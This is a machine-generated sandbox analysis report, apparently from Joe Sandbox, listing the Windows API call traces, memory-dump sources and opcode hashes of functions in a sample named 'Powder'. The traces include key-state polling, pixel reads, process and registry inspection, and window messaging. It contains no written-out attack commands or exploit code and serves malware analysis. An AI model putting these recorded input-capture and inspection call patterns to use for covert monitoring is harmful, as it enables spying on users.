                                                  • GetStdHandle.KERNEL32(0000000C), ref: 00E673BC
                                                  • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00E673F6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: CreateHandle$FilePipe
                                                  • String ID: nul
                                                  • API String ID: 4209266947-2873401336
                                                  • Opcode ID: bc534abac2b702bb41a7cf1f1f40ac8b869c9645e5f3b96e4e840b6e3d6b92fa
                                                  • Instruction ID: 41fe68f75e99005929717ebbaf645ec838761a538efdc558e119dbff8b2a11f7
                                                  • Opcode Fuzzy Hash: bc534abac2b702bb41a7cf1f1f40ac8b869c9645e5f3b96e4e840b6e3d6b92fa
                                                  • Instruction Fuzzy Hash: 9A2171705883069FDB208F65EC05A9E7BE4AF54768F205A1AFCE0F72E0D7709850DB50
                                                  APIs
                                                  • GetStdHandle.KERNEL32(000000F6), ref: 00E67444
                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00E67476
                                                  • GetStdHandle.KERNEL32(000000F6), ref: 00E67487
                                                  • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00E674C1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: CreateHandle$FilePipe
                                                  • String ID: nul
                                                  • API String ID: 4209266947-2873401336
                                                  • Opcode ID: a52da5d09b2baaf7245309724c7969000205c01eb51e723e6a8afb69fba325a4
                                                  • Instruction ID: be0607ddb93c82e570f1e5d9ab164587d1d6b90410359a0ed420439643076ce2
                                                  • Opcode Fuzzy Hash: a52da5d09b2baaf7245309724c7969000205c01eb51e723e6a8afb69fba325a4
                                                  • Instruction Fuzzy Hash: D721E2315483059FDB208F69AC08A9A7BE8AF453B8F201A0AF8F0F72E1DF709850C750
                                                  APIs
                                                  • SetErrorMode.KERNEL32(00000001), ref: 00E6B297
                                                  • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00E6B2EB
                                                  • __swprintf.LIBCMT ref: 00E6B304
                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000,00E90980), ref: 00E6B342
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode$InformationVolume__swprintf
                                                  • String ID: %lu
                                                  • API String ID: 3164766367-685833217
                                                  • Opcode ID: 5b3238d6b7930c54177cb072a3ae3e2b1420561d7144f66ec4bcc07d29837038
                                                  • Instruction ID: 7d35ab2e463b66bb8eb6d237174e60c90eff381cdd35f40825bdf327105166eb
                                                  • Opcode Fuzzy Hash: 5b3238d6b7930c54177cb072a3ae3e2b1420561d7144f66ec4bcc07d29837038
                                                  • Instruction Fuzzy Hash: 65216070A40209AFCB10EFA5D945DEEB7F8EF89704B1040A9F905F7292DB71EA45CB61
                                                  APIs
                                                    • Part of subcall function 00E11821: _memmove.LIBCMT ref: 00E1185B
                                                    • Part of subcall function 00E5AA52: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00E5AA6F
                                                    • Part of subcall function 00E5AA52: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E5AA82
                                                    • Part of subcall function 00E5AA52: GetCurrentThreadId.KERNEL32 ref: 00E5AA89
                                                    • Part of subcall function 00E5AA52: AttachThreadInput.USER32(00000000), ref: 00E5AA90
                                                  • GetFocus.USER32 ref: 00E5AC2A
                                                    • Part of subcall function 00E5AA9B: GetParent.USER32(?), ref: 00E5AAA9
                                                  • GetClassNameW.USER32(?,?,00000100), ref: 00E5AC73
                                                  • EnumChildWindows.USER32(?,00E5ACEB), ref: 00E5AC9B
                                                  • __swprintf.LIBCMT ref: 00E5ACB5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                  • String ID: %s%d
                                                  • API String ID: 1941087503-1110647743
                                                  • Opcode ID: 418c3ca3c633e3f4e647d0b8f1377c1f4dcd0e9d934795208b220260c9d0e795
                                                  • Instruction ID: 5f24689e8a258615d15aa5235ad5f37676431da1a4f1de97c0f1157991a595ec
                                                  • Opcode Fuzzy Hash: 418c3ca3c633e3f4e647d0b8f1377c1f4dcd0e9d934795208b220260c9d0e795
                                                  • Instruction Fuzzy Hash: 2A11E475200204ABCF11BFA0CD85FEA77ACAB88311F046476FE09BA143DB705949CB72
                                                  APIs
                                                  • CharUpperBuffW.USER32(?,?), ref: 00E62318
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: BuffCharUpper
                                                  • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                  • API String ID: 3964851224-769500911
                                                  • Opcode ID: aa35382b193a884dafa90c5c95f93bca011590a285ccbc2003ae3b64d9c4ca04
                                                  • Instruction ID: fb3736f320a9a09173542b8a17cd857a9aab3a1d45081d94853cc76b2ad05280
                                                  • Opcode Fuzzy Hash: aa35382b193a884dafa90c5c95f93bca011590a285ccbc2003ae3b64d9c4ca04
                                                  • Instruction Fuzzy Hash: C1118E3098112A9FCF00EF94E8514EEB7B8FF16384F1060A9D91077392EB725D06CB40
                                                  APIs
                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00E7F2F0
                                                  • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00E7F320
                                                  • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00E7F453
                                                  • CloseHandle.KERNEL32(?), ref: 00E7F4D4
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                  • String ID:
                                                  • API String ID: 2364364464-0
                                                  • Opcode ID: c4d224a2b54890b08a003e5c9b3b9d712b6d673f59b2b27c083aeba038b4ff86
                                                  • Instruction ID: 09241e66e3aa9ee550c970e89c1461051a0e76b218b1e5f7e83aa4b9c71c9e0a
                                                  • Opcode Fuzzy Hash: c4d224a2b54890b08a003e5c9b3b9d712b6d673f59b2b27c083aeba038b4ff86
                                                  • Instruction Fuzzy Hash: 2B8192B16043019FD720EF28D986F2AB7E5AF44714F14991DFA99EB2D2D7B0AC408B91
                                                  APIs
                                                    • Part of subcall function 00E11A36: _memmove.LIBCMT ref: 00E11A77
                                                    • Part of subcall function 00E8147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E8040D,?,?), ref: 00E81491
                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E8075D
                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E8079C
                                                  • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00E807E3
                                                  • RegCloseKey.ADVAPI32(?,?), ref: 00E8080F
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00E8081C
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                  • String ID:
                                                  • API String ID: 3440857362-0
                                                  • Opcode ID: 2562c6f7f0eea1ee720a4cac60a028aab0f08c962415febe39d607e00bd56fd9
                                                  • Instruction ID: 64d96de0414c885e303229b66fe7643e4065e0e872f2adb7ab800f30cdae7389
                                                  • Opcode Fuzzy Hash: 2562c6f7f0eea1ee720a4cac60a028aab0f08c962415febe39d607e00bd56fd9
                                                  • Instruction Fuzzy Hash: 84515E71208204AFD744EF64C981F6EB7E9FF84304F00591EF599A72A1DB31E949CB52
                                                  APIs
                                                  • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00E6EC62
                                                  • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00E6EC8B
                                                  • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00E6ECCA
                                                    • Part of subcall function 00E04D37: __itow.LIBCMT ref: 00E04D62
                                                    • Part of subcall function 00E04D37: __swprintf.LIBCMT ref: 00E04DAC
                                                  • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00E6ECEF
                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00E6ECF7
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                  • String ID:
                                                  • API String ID: 1389676194-0
                                                  • Opcode ID: 2fb4ecffbc9b92a69d9a323266013b8105fdf08f9c3672d10a46d4edb621ee2d
                                                  • Instruction ID: 8899e0cbecc1c75c1aa52259d51ccaba07d5ec121f270d022ec32c565be9d415
                                                  • Opcode Fuzzy Hash: 2fb4ecffbc9b92a69d9a323266013b8105fdf08f9c3672d10a46d4edb621ee2d
                                                  • Instruction Fuzzy Hash: 0A513B75A00109DFCB01EF64D985EAEBBF5EF08314B148499E909BB3A2CB31ED51DB50
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b17c0f0a496814f4ce47da6e1ee3c81e4c9a6a651d9011f930924753e6a430ad
                                                  • Instruction ID: e7c623b7077944f59ecc5643e71239fb76263d777ac6e5a8d0cad8bf3be65f32
                                                  • Opcode Fuzzy Hash: b17c0f0a496814f4ce47da6e1ee3c81e4c9a6a651d9011f930924753e6a430ad
                                                  • Instruction Fuzzy Hash: 5541EF35900114AFE720EB28CC88FA9BBB9AB09314F181177F91EB72D1C672AD41EB51
                                                  APIs
                                                  • GetCursorPos.USER32(?), ref: 00E02727
                                                  • ScreenToClient.USER32(00EC77B0,?), ref: 00E02744
                                                  • GetAsyncKeyState.USER32(00000001), ref: 00E02769
                                                  • GetAsyncKeyState.USER32(00000002), ref: 00E02777
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: AsyncState$ClientCursorScreen
                                                  • String ID:
                                                  • API String ID: 4210589936-0
                                                  • Opcode ID: 8c7e8954d143e2c0c0e858e75c554f23e1ac6f6329db12a2079ec3e0b2d2b50f
                                                  • Instruction ID: 14a54010135a08066128211056555aed34e8cdfb2d1275e60e004220077676e8
                                                  • Opcode Fuzzy Hash: 8c7e8954d143e2c0c0e858e75c554f23e1ac6f6329db12a2079ec3e0b2d2b50f
                                                  • Instruction Fuzzy Hash: D9414C35504119FFDF159F68C848AE9BBB4BB05328F24935AF928B22D0CB31AD94DB91
                                                  APIs
                                                  • GetWindowRect.USER32(?,?), ref: 00E595E8
                                                  • PostMessageW.USER32(?,00000201,00000001), ref: 00E59692
                                                  • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00E5969A
                                                  • PostMessageW.USER32(?,00000202,00000000), ref: 00E596A8
                                                  • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00E596B0
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: MessagePostSleep$RectWindow
                                                  • String ID:
                                                  • API String ID: 3382505437-0
                                                  • Opcode ID: 7ac459bfbb56f244a7405efbff4272affa5abcfff3dedf8c7dd92941b355c4ab
                                                  • Instruction ID: 415ba2e28e0a3b4779b553893fac27fce9228c8dd27635ac7f79002c99b9a7e1
                                                  • Opcode Fuzzy Hash: 7ac459bfbb56f244a7405efbff4272affa5abcfff3dedf8c7dd92941b355c4ab
                                                  • Instruction Fuzzy Hash: 4C31CE71900219EFDB14CF69D94CADE3BB5FB44316F10461AFD25AB1D2C3B09928DB91
                                                  APIs
                                                  • IsWindowVisible.USER32(?), ref: 00E5BD9D
                                                  • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00E5BDBA
                                                  • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00E5BDF2
                                                  • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00E5BE18
                                                  • _wcsstr.LIBCMT ref: 00E5BE22
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                  • String ID:
                                                  • API String ID: 3902887630-0
                                                  • Opcode ID: bb029727197b820a10caae638d8941fa0a5dd8eb24490730fc6ace7373c8110e
                                                  • Instruction ID: cadae3937e7971b2ac65ab30162223eb3d72509766d558652d17e2740dd97bb1
                                                  • Opcode Fuzzy Hash: bb029727197b820a10caae638d8941fa0a5dd8eb24490730fc6ace7373c8110e
                                                  • Instruction Fuzzy Hash: 62212932204218BFEB255B35AC0AEBB7BACDF45760F14502AFD09EA192EF61DC449760
                                                  APIs
                                                    • Part of subcall function 00E029E2: GetWindowLongW.USER32(?,000000EB), ref: 00E029F3
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00E8B804
                                                  • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00E8B829
                                                  • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00E8B841
                                                  • GetSystemMetrics.USER32(00000004), ref: 00E8B86A
                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00E7155C,00000000), ref: 00E8B888
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Window$Long$MetricsSystem
                                                  • String ID:
                                                  • API String ID: 2294984445-0
                                                  • Opcode ID: d3fac5c73e304373fe027974c10467702acac4a04c9c98ba4b430b3518ac7a1f
                                                  • Instruction ID: 950748c67bd9ee943217e4804ba837790c59a729ad0dd6084eee403adfa3ab64
                                                  • Opcode Fuzzy Hash: d3fac5c73e304373fe027974c10467702acac4a04c9c98ba4b430b3518ac7a1f
                                                  • Instruction Fuzzy Hash: DE219431914255AFCB28AF398C08B6A37A8FB45724F11573AF92DF61E0D7309814CB80
                                                  APIs
                                                  • IsWindow.USER32(00000000), ref: 00E76159
                                                  • GetForegroundWindow.USER32 ref: 00E76170
                                                  • GetDC.USER32(00000000), ref: 00E761AC
                                                  • GetPixel.GDI32(00000000,?,00000003), ref: 00E761B8
                                                  • ReleaseDC.USER32(00000000,00000003), ref: 00E761F3
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Window$ForegroundPixelRelease
                                                  • String ID:
                                                  • API String ID: 4156661090-0
                                                  • Opcode ID: 49621f926b52f608cc832b507ccb37087561c52b3a1cf18256dbcb8b5ba8ce1c
                                                  • Instruction ID: 1e5182293b282b80bd5611fb29c0cfd488d475b9780e1f9a15d9c64ca5663eb6
                                                  • Opcode Fuzzy Hash: 49621f926b52f608cc832b507ccb37087561c52b3a1cf18256dbcb8b5ba8ce1c
                                                  • Instruction Fuzzy Hash: 2E219676A016049FD714EF65DD88A9ABBF5EF48350F04C46AF94AE7352CB30AD44CB90
                                                  APIs
                                                  • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E01729
                                                  • SelectObject.GDI32(?,00000000), ref: 00E01738
                                                  • BeginPath.GDI32(?), ref: 00E0174F
                                                  • SelectObject.GDI32(?,00000000), ref: 00E01778
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: ObjectSelect$BeginCreatePath
                                                  • String ID:
                                                  • API String ID: 3225163088-0
                                                  • Opcode ID: cd72f4375d462fbe33df422af6e6ea289111aafedf66cf31e27014e6ef3879e1
                                                  • Instruction ID: 45f1f8e96ce3ab2159fe2b6bf478a4f22eaf73d1342f892aaa3d18728247af34
                                                  • Opcode Fuzzy Hash: cd72f4375d462fbe33df422af6e6ea289111aafedf66cf31e27014e6ef3879e1
                                                  • Instruction Fuzzy Hash: 98219232408318EFDB119F26EC49B6D7BE8A701315F144267FA55BA1E0D772989ACF90
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: _memcmp
                                                  • String ID:
                                                  • API String ID: 2931989736-0
                                                  • Opcode ID: 37bfb623f30af0b4a4a1004ac3f536d8e38c8ec5f1aa036207a688fc383b2d80
                                                  • Instruction ID: f8d90e56bc4b933f313387d48c9ba7aca3f5488d5e5d8344465d0063cd473373
                                                  • Opcode Fuzzy Hash: 37bfb623f30af0b4a4a1004ac3f536d8e38c8ec5f1aa036207a688fc383b2d80
                                                  • Instruction Fuzzy Hash: B901F9626003153FD6086120AC52FFB739C9A3034AF146465FE07B6741F750FF1882E0
                                                  APIs
                                                  • GetCurrentThreadId.KERNEL32 ref: 00E65075
                                                  • __beginthreadex.LIBCMT ref: 00E65093
                                                  • MessageBoxW.USER32(?,?,?,?), ref: 00E650A8
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00E650BE
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00E650C5
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
